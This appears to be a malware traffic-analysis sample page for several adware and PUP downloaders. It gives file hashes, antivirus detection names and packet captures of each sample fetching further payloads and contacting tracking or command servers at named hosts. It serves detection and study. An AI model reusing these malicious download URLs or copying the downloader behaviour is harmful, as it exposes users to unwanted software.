PUP Trojan/Adware Borderline Porn Application Downloader Pay-per-Download Malware PCAP file download

SHA256: 478f86e31c4bd8bd6ccf86696375949029d20f6736c4e01c577e99adec0c112d
File name: pingguo_21561000328.exe
Detection ratio: 44 / 57
Analysis date: 2017-01-16 06:11:12 UTC ( 0 minutes ago )
AegisLab W32.Application.Guagua!c 20170114
AhnLab-V3 PUP/Win32.Downloader.C880528 20170115
Antiy-AVL Trojan/Win32.TSGeneric 20170116
Arcabit Adware.Generic.D1A3B8D 20170116
Avast Win32:Adware-gen [Adw] 20170116
BitDefender Adware.Generic.1719181 20170116
Bkav W32.Clod07d.Trojan.ffdb 20170114
CAT-QuickHeal Program.Hadsruda 20170116
ClamAV Win.Trojan.Generic-5415795-0 20170116
Comodo ApplicUnwnt.Win32.PornTool.GuaGua.A 20170116
CrowdStrike Falcon (ML) malicious_confidence_64% (D) 20161024
Cyren W32/S-94c424df!Eldorado 20170116
DrWeb Adware.Downware.10691 20170116
ESET-NOD32 a variant of Win32/PornTool.GuaGua.A potentially unsafe 20170116
F-Prot W32/S-94c424df!Eldorado 20170116
F-Secure Adware.Generic.1719181 20170116
Fortinet Riskware/PornTool_GuaGua 20170116
GData Adware.Generic.1719181 20170116
Ikarus PUA.Agent 20170115

2017-01-15 23:06:09.615300 IP 192.168.1.102.62519 > 14.215.74.85.80: Flags [P.], seq 2253497686:2253497989, ack 3986861207, win 256, length 303: HTTP: GET /re58/pingguo_21561000328.exe HTTP/1.1
E..Wm.@…p….f..JU.7.P.Q.V….P…m…GET /re58/pingguo_21561000328.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: c.img001.com
Connection: Keep-Alive

2017-01-15 23:06:16.677816 IP 192.168.1.102.62520 > 66.61.160.250.80: Flags [P.], seq 1637321297:1637321477, ack 1159308532, win 256, length 180: HTTP: GET /sfsca.crl HTTP/1.1
E…Y.@……..fB=…8.Pa..QE…P….D..GET /sfsca.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.startssl.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2017-01-15 23:06:17.308817 IP 192.168.1.102.62521 > 222.73.144.174.80: Flags [P.], seq 281322195:281322373, ack 2294700839, win 260, length 178: HTTP: GET /ca1.crl HTTP/1.1
E…..@….=…f.I…9.P……[‘P…….GET /ca1.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crls1.wosign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2017-01-15 23:06:17.601080 IP 192.168.1.102.62521 > 222.73.144.174.80: Flags [P.], seq 178:363, ack 1075, win 256, length 185: HTTP: GET /ca1-code-3.crl HTTP/1.1
E…..@….5…f.I…9.P……_YP…c:..GET /ca1-code-3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crls1.wosign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2017-01-15 23:06:23.023581 IP 192.168.1.102.62522 > 117.27.228.84.80: Flags [P.], seq 3283022524:3283022767, ack 1419530151, win 256, length 243: HTTP: GET /downloader/start?dlver=G1.0.0&pname=pingguo55&pver=1.0.0&cmdtype=0&cmdid=1&ad=0&oemid=0&fromurl=&webid= HTTP/1.1
E…;.@……..fu..T.:.P….T.O.P…….GET /downloader/start?dlver=G1.0.0&pname=pingguo55&pver=1.0.0&cmdtype=0&cmdid=1&ad=0&oemid=0&fromurl=&webid= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Host: cj.pingguo55.com
Cache-Control: no-cache

2017-01-15 23:07:14.841174 IP 192.168.1.102.62522 > 117.27.228.84.80: Flags [P.], seq 243:547, ack 245, win 255, length 304: HTTP: GET /downloader/startdown?dlver=G1.0.0&pname=pingguo55&pver=1.0.0&cmdtype=0&cmdid=1&ad=0&oemid=0&fromurl=&webid= HTTP/1.1
E..X;.@….k…fu..T.:.P….T.P.P…….GET /downloader/startdown?dlver=G1.0.0&pname=pingguo55&pver=1.0.0&cmdtype=0&cmdid=1&ad=0&oemid=0&fromurl=&webid= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Host: cj.pingguo55.com
Cache-Control: no-cache
Cookie: GUAGUAACOUNTID=9d58da31cb70431fa57b0dd19171c119

2017-01-15 23:07:15.462551 IP 192.168.1.102.62523 > 117.27.228.83.80: Flags [P.], seq 52355107:52355286, ack 1485008876, win 256, length 179: HTTP: HEAD /business/5/pingguo.exe HTTP/1.1
E….A@….^…fu..S.;.P…#X.o.P…….HEAD /business/5/pingguo.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Host: tg.img001.com
Content-Length: 0
Cache-Control: no-cache

2017-01-15 23:07:16.161211 IP 192.168.1.102.62524 > 117.27.228.83.80: Flags [P.], seq 3252730637:3252730820, ack 1975907044, win 256, length 183: HTTP: GET /business/5/pingguo.exe HTTP/1.1
E….G@….T…fu..S.<.P….u…P….>..GET /business/5/pingguo.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Range: bytes=0-3686399
Host: tg.img001.com
Accept: */*
Cache-Control: no-cache

2017-01-15 23:07:16.186591 IP 192.168.1.102.62525 > 117.27.228.83.80: Flags [P.], seq 1631289889:1631290079, ack 4275762285, win 256, length 190: HTTP: GET /business/5/pingguo.exe HTTP/1.1
E….I@….K…fu..S.=.Pa;.!…mP…z…GET /business/5/pingguo.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Range: bytes=3686400-18386360
Host: tg.img001.com
Accept: */*
Cache-Control: no-cache

Thunder Adware PUP PCAP File Download Traffic Analysis Sample xunlei_118827.exe

SHA256: bf1cf754ad5f5f3560047b8eeb784c72bf79a042dec4d50d033e32912a7b19b6
File name: xunlei_118827.exe
Detection ratio: 35 / 56
Analysis date: 2016-10-28 03:31:01 UTC ( 0 minutes ago )
AVware Trojan.Win32.Generic!BT 20161027
Ad-Aware Adware.Thunder.E 20161028
AegisLab Troj.Gen!c 20161028
AhnLab-V3 PUP/Win32.Helper.R188024 20161027
Arcabit Adware.Thunder.E 20161028
BitDefender Adware.Thunder.E 20161028
Comodo UnclassifiedMalware 20161028
CrowdStrike Falcon (ML) malicious_confidence_76% (W) 20161024
Cyren W32/Adware.AOGL-3044 20161028
DrWeb Adware.Downware.2436 20161028
ESET-NOD32 a variant of Win32/RiskWare.ThunderHelper.A 20161028
Emsisoft Adware.Thunder.E (B) 20161028
F-Prot W32/Adware.ALLT 20161028
F-Secure Adware.Thunder.E 20161028
Fortinet Bfr.FJ!tr 20161028
GData Adware.Thunder.E 20161028
Invincea backdoor.win32.dunsenr.b 20161018
K7AntiVirus Riskware ( 0040eff71 ) 20161025

 

2016-10-27 20:13:00.327418 IP 192.168.1.102.56001 > 61.147.75.43.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /xunlei_118827.exe HTTP/1.1
E..L=.@…p….f=.K+…P..wv4)O.P…g<..GET /xunlei_118827.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.pf11.com
Connection: Keep-Alive

2016-10-27 20:13:00.582113 IP 192.168.1.102.56001 > 61.147.75.43.80: Flags [.], ack 1073, win 252, length 0
E..(=.@…r….f=.K+…P..x.4)T.P….”……..

E..(>M@…q….f=.K+…P}./..[..P…]e……..
2016-10-27 20:13:08.057545 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [P.], seq 0:220, ack 1, win 256, length 220: HTTP: GET /html/index.asp HTTP/1.1
E…>N@…p….f=.K+…P}./..[..P…….GET /html/index.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive

2016-10-27 20:13:08.307815 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [P.], seq 220:491, ack 409, win 255, length 271: HTTP: GET /index.html HTTP/1.1
E..7>O@…p….f=.K+…P}.0h.[.=P…….GET /index.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDSAQBRRAC=JBCFOGDBBPAIPFJMNJCNJFDM

2016-10-27 20:13:08.556954 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [.], ack 1481, win 256, leng

SHA256: bf1cf754ad5f5f3560047b8eeb784c72bf79a042dec4d50d033e32912a7b19b6
File name: xunlei_118827.exe
Detection ratio: 35 / 56
Analysis date: 2016-10-28 03:31:01 UTC ( 0 minutes ago )

th 0

E..4>\@…q….f=.K+…P.9I……. ..t…………..
2016-10-27 20:13:09.342501 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [P.], seq 491:803, ack 12265, win 256, length 312: HTTP: GET /homepage.asp HTTP/1.1
E..`>]@…pn…f=.K+…P}.1w.[..P…V…GET /homepage.asp HTTP/1.1
Accept: */*
Referer: http://m.pf11.com/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDSAQBRRAC=JBCFOGDBBPAIPFJMNJCNJFDM

2016-10-27 20:13:09.587021 IP 192.168.1.102.56004 > 61.147.75.43.80: Flags [P.], seq 0:309, ack 1, win 256, length 309: HTTP: GET /json3.asp HTTP/1.1
E..]>_@…po…f=.K+…P.9I…..P…….GET /json3.asp HTTP/1.1
Accept: */*
Referer: http://m.pf11.com/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDSAQBRRAC=JBCFOGDBBPAIPFJMNJCNJFDM


E..(>d@…q….f=.K+…P}.2..[.LP………….
2016-10-27 20:13:09.636681 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [P.], seq 803:1115, ack 17064, win 251, length 312: HTTP: GET /xl_login.asp HTTP/1.1
E..`>e@…pf…f=.K+…P}.2..[.LP…0…GET /xl_login.asp HTTP/1.1
Accept: */*
Referer: http://m.pf11.com/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDSAQBRRAC=JBCFOGDBBPAIPFJMNJCNJFDM


E..(AH@….L…f.dJ….PK.2V….P………….
2016-10-27 20:13:09.655618 IP 192.168.1.102.56005 > 202.100.74.200.80: Flags [P.], seq 0:281, ack 1, win 256, length 281: HTTP: GET /stat.php?id=5808533&web_id=5808533 HTTP/1.1
E..AAI@….2…f.dJ….PK.2V….P…)…GET /stat.php?id=5808533&web_id=5808533 HTTP/1.1
Accept: */*
Referer: http://m.pf11.com/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: s13.cnzz.com
Connection: Keep-Alive

 

2016-10-27 20:13:40.614387 IP 192.168.1.102.56023 > 66.198.178.112.80: Flags [P.], seq 0:205, ack 1, win 256, length 205: HTTP: GET /down/4682/Browser_V5.7.16173.12_r_4682_(Build1610201330).exe HTTP/1.1
E…..@…5….fB..p…P..W…! P…….GET /down/4682/Browser_V5.7.16173.12_r_4682_(Build1610201330).exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: umcdn.uc.cn
Connection: Keep-Alive

Mikey PUP Trojan Adware Downloader CNC PCAP file download Traffic Sample hplaserjetm1136@151_11446.exe

SHA256: e7e729e9d23aeac5ff826c5d3389f5c1cc2982d3d43168e2f5af705709db47da
File name: hplaserjetm1136@151_11446.exe
Detection ratio: 39 / 54
Analysis date: 2016-10-28 01:48:35 UTC ( 1 minute ago )
AVG Generic37.CELZ 20161028
AVware Trojan.Win32.Generic!BT 20161027
Ad-Aware Gen:Variant.Application.Mikey.34859 20161028
AegisLab Adware.W32.Agent!c 20161027
AhnLab-V3 PUP/Win32.Installer.R185010 20161027
Antiy-AVL Trojan/Win32.PackedNsisMod.o 20161027
Arcabit Trojan.Application.Mikey.D882B 20161028
Avast Win32:Malware-gen 20161027
BitDefender Gen:Variant.Application.Mikey.34859 20161028
CAT-QuickHeal Heur.Downloader 20161027
ClamAV Win.Trojan.Agent-1726718 20161027
Comodo Application.Win32.NSISmod.~O 20161028
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
Cyren W32/Mikey.U.gen!Eldorado 20161028
DrWeb Trojan.Winlock.13291 20161028
ESET-NOD32 a variant of Win32/Packed.NSISmod.O suspicious 20161028
F-Prot W32/Mikey.U.gen!Eldorado 20161028
F-Secure Gen:Variant.Application.Mikey 20161028
Fortinet Adware/Agent 20161028

 

 

2016-10-27 19:13:52.690393 IP 192.168.1.102.55661 > 61.172.246.236.80: Flags [P.], seq 0:329, ack 1, win 256, length 329: HTTP: GET /cx/160624/6/hplaserjetm1136@151_11446.exe HTTP/1.1
E..qn.@….W…f=….m.Pc.(s..A.P….g..GET /cx/160624/6/hplaserjetm1136@151_11446.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 1476500920.xiazaidown.com
Connection: Keep-Alive

2016-10-27 19:14:16.551335 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [P.], seq 0:193, ack 1, win 256, length 193: HTTP: GET /api.php?id=11446[1]&qid=151&rand=52229065361&title=hplaserjetm1136&t=0 HTTP/1.1
E…..@…L….fy+q..p.P..~;.p=LP…:W..GET /api.php?id=11446[1]&qid=151&rand=52229065361&title=hplaserjetm1136&t=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: down.xiald.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-27 19:14:16.805491 IP 192.168.1.102.55319 > 75.75.75.75.53: 43761+ A? www.drvsky.com. (32)
E..<‘……D…fKKKK…5.(r…………..www.drvsky.com…..
2016-10-27 19:14:16.852510 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [.], ack 430, win 254, length 0
E..(..@…MN…fy+q..p.P..~..p>.P………….

E..(‘P@……..fy(…q.P>…]..;P….x……..
2016-10-27 19:14:17.354802 IP 192.168.1.102.55665 > 121.40.20.195.80: Flags [P.], seq 0:144, ack 1, win 256, length 144: HTTP: GET /down_api.asp?id=11446 HTTP/1.1
E…’Q@……..fy(…q.P>…]..;P…y…GET /down_api.asp?id=11446 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: www.drvsky.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-27 19:14:17.910185 IP 192.168.1.102.55665 > 121.40.20.195.80: Flags [.], ack 937, win 252, length 0
E..(‘R@……..fy(…q.P>…]…P….D……..
2016-10-27 19:14:18.794922 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [P.], seq 193:396, ack 430, win 254, length 203: HTTP: GET /cfg.php?id=11446[1]&qid=151&rand=52229065361&title=hplaserjetm1136&t=0&flag=1024 HTTP/1.1
E…..@…L….fy+q..p.P..~..p>.P…….GET /cfg.php?id=11446[1]&qid=151&rand=52229065361&title=hplaserjetm1136&t=0&flag=1024 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: down.xiald.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-27 19:14:19.088333 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [.], ack 3350, win 256, length 0
E..(..@…ML…fy+q..p.P…..pJaP………….
2016-10-27 19:14:19.327336 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [.], ack 6270, win 256, length 0
E..(..@…MK…fy+q..p.P…..pU.P………….

E..({.@….L…f…..r.P..dZ..lpP………….
2016-10-27 19:14:20.661122 IP 192.168.1.102.55666 > 220.243.235.201.80: Flags [P.], seq 0:116, ack 1, win 256, length 116: HTTP: GET /shichangbu/ico/haitao1hao.ico HTTP/1.0
E…{.@……..f…..r.P..dZ..lpP…….GET /shichangbu/ico/haitao1hao.ico HTTP/1.0
Host: down.shg20.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-27 19:19:56.406517 IP 192.168.1.102.55689 > 221.204.226.184.80: Flags [P.], seq 0:224, ack 1, win 256, length 224: HTTP: GET /yunpan/LaserJet_M1130_M1210_All.zip HTTP/1.1
E…..@…o….f…….P.
._&eCdP… y..GET /yunpan/LaserJet_M1130_M1210_All.zip HTTP/1.1
Referer: http://www.drvsky.com/hp/HP_M1136.htm
User-Agent: LXdl_plug-in v15.06.10 (compatible; MSIE 9.0; Windows NT 6.0)
Host: dvip.drvsky.com
Cache-Control: no-cache

2016-10-27 19:19:56.461246 IP 192.168.1.102.55690 > 42.156.140.84.80: Flags [.], ack 3635846172, win 65340, length 0
E..(1.@…O….f*..T…P..N…..P..<……….
2016-10-27 19:19:56.461899 IP 192.168.1.102.55690 > 42.156.140.84.80: Flags [P.], seq 0:374, ack 1, win 65340, length 374: HTTP: GET /stat.htm?id=1256279146&r=&lg=en-us&ntime=none&cnzz_eid=1850689330-1477607248-&showp=1920×1080&t=&h=1&rnd=139741822 HTTP/1.1
E…1.@…Nz…f*..T…P..N…..P..<.F..GET /stat.htm?id=1256279146&r=&lg=en-us&ntime=none&cnzz_eid=1850689330-1477607248-&showp=1920×1080&t=&h=1&rnd=139741822 HTTP/1.1
Accept: */*
Referer: http://xiazai.xiazai2.net/sc/xiazaiqi.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: z4.cnzz.com
Connection: Keep-Alive

FusionCore Trojan/Malware/PUP Downloader Bundled SecureStudies.com Adware PCAP file download traffic sample

SHA256: ab5da9478d76221b534e4847e6968b7977771916ce81ac2810c3917f6ce5a48c
File name: PCTuneUpWiFiHotspotCreator_IS.exe
Detection ratio: 23 / 55
Analysis date: 2016-10-28 01:34:21 UTC ( 1 minute ago )
AVware Trojan.Win32.Generic!BT 20161027
AegisLab Script.Application.Gen!c 20161027
AhnLab-V3 Malware/Gen.Generic.N2102538991 20161027
CAT-QuickHeal PUA.Techevolve.Gen 20161027
ClamAV Win.Trojan.Generic-2682 20161027
Comodo Application.Win32.FusionCore.~J 20161028
Cyren W32/Trojan.IFZA-1289 20161028
DrWeb Trojan.InstallCore.2673 20161028
ESET-NOD32 a variant of Win32/FusionCore.J potentially unwanted 20161028
Fortinet Riskware/FusionCore 20161028
GData Script.Application.FusionCore.B 20161028
Invincea trojan.win32.dorv.b!rfn 20161018
K7AntiVirus Trojan ( 004fb4121 ) 20161025
K7GW Trojan ( 004fb4121 ) 20161027
McAfee Artemis!FC4E7C56C226 20161028
McAfee-GW-Edition BehavesLike.Win32.Dropper.vc 20161028
NANO-Antivirus Trojan.Win32.InstallCore.egpdia 20161028
Symantec Trojan.Gen.2 20161028
TrendMicro TROJ_GEN.F0CBC0UJJ16 20161028
TrendMicro-HouseCall TROJ_GEN.F0CBC0UJJ16 20161028
VIPRE Trojan.Win32.Generic!BT 20161027

d

2016-10-27 19:39:26.628074 IP 192.168.1.102.55768 > 184.173.227.119.80: Flags [P.], seq 0:348, ack 1, win 256, length 348: HTTP: GET /pctuneupsuite.com/filesdownload/PCTuneUpWiFiHotspotCreator_IS.exe HTTP/1.1
E…/V@…k….f…w…P&……|P…….GET /pctuneupsuite.com/filesdownload/PCTuneUpWiFiHotspotCreator_IS.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.downloadonic.com
Connection: Keep-Alive

2016-10-27 19:39:26.684291 IP 192.168.1.102.55768 > 184.173.227.119.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0
E..4/W@…m9…f…w…P&..+…|….b……

E..(F.@…uY…f4.H….P..|….gP… ………
2016-10-27 19:39:40.320312 IP 192.168.1.102.55769 > 52.2.72.151.80: Flags [P.], seq 0:214, ack 1, win 256, length 214: HTTP: POST /?v=2.0&subver=6.21&pcrc=2064493350 HTTP/1.1
E…F.@…t….f4.H….P..|….gP…n3..POST /?v=2.0&subver=6.21&pcrc=2064493350 HTTP/1.1
Accept: */*
Host: rp.didided1.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 2064
Cache-Control: no-cache

2016-10-27 19:39:40.321074 IP 192.168.1.102.55769 > 52.2.72.151.80: Flags [P.], seq 214:1674, ack 1, win 256, length 1460: HTTP
E…F.@…o….f4.H….P..}….gP…C……3E.Q)_l.y…K…(..J’…….$u..m…….O.T..        .K3….7.hK…..Q4^.Ky……..3r)2.u…….CUa…o…5……h….l..U_-.a…..lu…Na.Ii.|..qr._…Rx.1x.PA.j……’8…z…m…BS…y….%>..+.)….j.:}_.l.’…..B    l`………m).%.!.^….}=d;..#V;..W.c,Z…..C].;..z…]………..8.M.8.1….E..<..S………u…u…..0…3.u.u.%.W.%..fl4.,^.
}.M.D……5\9……?…Z..\.W(..=7@s…..p\…xC….-U8…D.N.P…avZ..@z.._i.h.(..x..9…….T.,..I…s:F.Y.6…./….Q….&^…TF]..Q.’…Yd..P>>……Q….I..=……

E..(..@…s….f6Ds….P.]…9..P………….
2016-10-27 19:39:40.889276 IP 192.168.1.102.55770 > 54.68.115.170.80: Flags [P.], seq 0:168, ack 1, win 256, length 168: HTTP: POST /FusionFreeAudioVideo/?v=6.0&c=610669024&t=398890 HTTP/1.1
E…./@…r….f6Ds….P.]…9..P…JA..POST /FusionFreeAudioVideo/?v=6.0&c=610669024&t=398890 HTTP/1.1
Accept: */*
Host: os.didided1.com
User-Agent: ICAS
Content-Length: 1600
Cache-Control: no-cache

2016-10-27 19:39:40.889297 IP 192.168.1.102.55770 > 54.68.115.170.80: Flags [P.], seq 168:1628, ack 1, win 256, length 1460: HTTP
E….0@…m….f6Ds….P.]…9..P…_m…^.S…N)Tw?.G{&…..F….{…D..|U.%…’|~.6.a.7B.g.:(………?.*.7″..VKx..h.#]..G… I.W.n….[.f….p…&.I.y..L..G%8^… ..p……._……h…[Xe.bRGl’R.1.[o.n:..M..!..SD.m..jc..15w….~..y1….S0a..G……%.#`$.:ql..e..{.t.T……w…..X.m..(..|..646…u.!.KE..^.=…….A..:.U\.:…Fr..~.:C…ts..0`……..%.n….y.}<……R>..dK..H.O?,B.cu.j.A…..nN.nL.j..u.
.rN.e.c…..<……..Ku..x”.S}.h…;.]….%X.u.1…L…….t..[.7…44……YH.0.U.U…../…}.. -..d..2&1\.HG~………..Ga2.2Co.b>.Vl…lU……x3.4g.’…IG..{.v….X…z.W..#.b…e.%..H.FD.%…k . Cc..    .s……}.32…..<……..Y./..lB…-@.JrOJ{.5..*…j…u. =.rC.)…&(p..O.Nh..fg….1.J………..8……$iQ^..XC..9……=I….k.]O…o.CH.*,…..y.5.+&…$.O~..&hFC……,.)CW7.v.w.S}*.T.[.L.0….={._oK..T..`~q..8.%.X.T.p…..H….J…z..6… .V.X..”.7..q1……..8.eB….,.(….Z:.m..OIG#………ak|8~.     lM.mTDZ.o..m}.9…S.:…………….;]………….Aa*)…..”..A.kn..5..5..gLc….\..esI..vN.#._……….o.+…~…|.3..s.(5.(6…”…;l…..Q..B..”6

E..(..@…=….f..N….P.n…   ~.P…q………
2016-10-27 19:39:40.932824 IP 192.168.1.102.55771 > 165.193.78.234.80: Flags [P.], seq 0:106, ack 1, win 256, length 106: HTTP: GET /packages/VR/PackageV.exe HTTP/1.0
E…..@…=….f..N….P.n…   ~.P….E..GET /packages/VR/PackageV.exe HTTP/1.0
Host: post.securestudies.com
User-Agent: InnoTools_Downloader

2016-10-27 19:42:47.932326 IP 192.168.1.102.55785 > 165.193.78.234.80: Flags [P.], seq 0:257, ack 1, win 256, length 257: HTTP: POST /TapAction.aspx?campaign_id=835&tpi=PCTuneUpWiFiHotspotCreator_IS&action_id=1&uid=jfk_YD1kku5Hj7W9N55555 HTTP/1.0
E..)..@…;….f..N….Pn..F…wP…….POST /TapAction.aspx?campaign_id=835&tpi=PCTuneUpWiFiHotspotCreator_IS&action_id=1&uid=jfk_YD1kku5Hj7W9N55555 HTTP/1.0
Host: post.securestudies.com
User-Agent: InnoTools_Downloader
Content-Type: Application/octet-stream
Content-Length: 11

RK web call
2016-10-27 19:42:47.991700 IP 192.168.1.102.55785 > 165.193.78.234.80: Flags [.], ack 241, win 255, length 0
E..(..@…<….f..N….Pn..G…gP………….
2016-10-27 19:42:47.992217 IP 192.168.1.102.55785 > 165.193.78.234.80: Flags [F.], seq 257, ack 241, win 255, length 0
E..(..@…<….f..N….Pn..G…gP………….

E..(e.@….g…f.:W….P…..6..P………….
2016-10-27 19:42:48.909219 IP 192.168.1.102.55787 > 199.58.87.155.80: Flags [P.], seq 0:230, ack 1, win 256, length 230: HTTP: GET /ofr/Nininininon/Nininininon_11Apr16.cis HTTP/1.1
E…e.@……..f.:W….P…..6..P…….GET /ofr/Nininininon/Nininininon_11Apr16.cis HTTP/1.1
Range: bytes=0-19488
Accept: */*
Host: cdnus.didided1.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Connection: Keep-Alive

2016-10-27 19:42:48.932162 IP 192.168.1.102.55787 > 199.58.87.155.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {540:2000}], length 0
E..4e.@….Y…f.:W….P…..6………….
.6…6..

E..({W@……..f…-…PH……>P….H……..
2016-10-27 19:42:52.983717 IP 192.168.1.102.55787 > 199.58.87.155.80: Flags [P.], seq 230:456, ack 20029, win 254, length 226: HTTP: GET /ofr/Malaromoro/Malaromoro_170515.cis HTTP/1.1
E..
e.@….{…f.:W….P…..6f.P…….GET /ofr/Malaromoro/Malaromoro_170515.cis HTTP/1.1
Range: bytes=0-8736
Accept: */*
Host: cdnus.didided1.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Connection: Keep-Alive

 

xigua.exe Plorexie Startpage Browser Hijacker Adware Traffic Analysis PCAP file download sample

SHA256: 9e44c764a9d3681f64f2dfc0bf62454ff463313e193d70614b0d7505204f9170
File name: xigua.exe
Detection ratio: 34 / 56
Analysis date: 2016-10-26 23:29:08 UTC ( 0 minutes ago )
Antivirus Result Update
ALYac Adware.GenericKD.3388535 20161026
AVG Generic_c.ERT 20161026
AVware Trojan.Win32.Generic!BT 20161027
Ad-Aware Adware.GenericKD.3388535 20161026
AegisLab Adware.Generickd!c 20161026
Antiy-AVL Trojan/Generic.ASMalwNS.54D8 20161026
Arcabit Adware.Generic.D33B477 20161026
Avira (no cloud) TR/AD.Plorexie.sourk 20161026
BitDefender Adware.GenericKD.3388535 20161027
CAT-QuickHeal Browsermodifier.Plorexie 20161026
Cyren W32/Plorexie.A.gen!Eldorado 20161027
DrWeb Trojan.Click3.22642 20161027
ESET-NOD32 Win32/StartPage.OVK 20161026

2016-10-25 22:56:18.223887 IP 192.168.1.102.60948 > 58.215.177.195.80: Flags [P.], seq 0:295, ack 1, win 256, length 295: HTTP: GET /618171115/xigua.exe HTTP/1.1
E..Op.@….”…f:……P…h..”.P…….GET /618171115/xigua.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down.cdyb.net
Connection: Keep-Alive

2016-10-25 22:56:30.452318 IP 192.168.1.102.60951 > 119.28.13.101.80: Flags [P.], seq 0:276, ack 1, win 258, length 276: HTTP: GET /1/aHR0cDovLzEyMy5hMTAxLmNjL3UucGhwP2lkPTg5JnNkPW51bGwmYW50PW51bGw= HTTP/1.1
E..<9+@…z….fw..e…P&.0.T…P….”..GET /1/aHR0cDovLzEyMy5hMTAxLmNjL3UucGhwP2lkPTg5JnNkPW51bGwmYW50PW51bGw= HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 17990.vicp.net
Connection: Keep-Alive
2016-10-25 22:56:30.713143 IP 192.168.1.102.62222 > 75.75.76.76.53: 35316+ A? 123.a101.cc. (29)
E..9…….i…fKKLL…5.%&j………….123.a101.cc…..

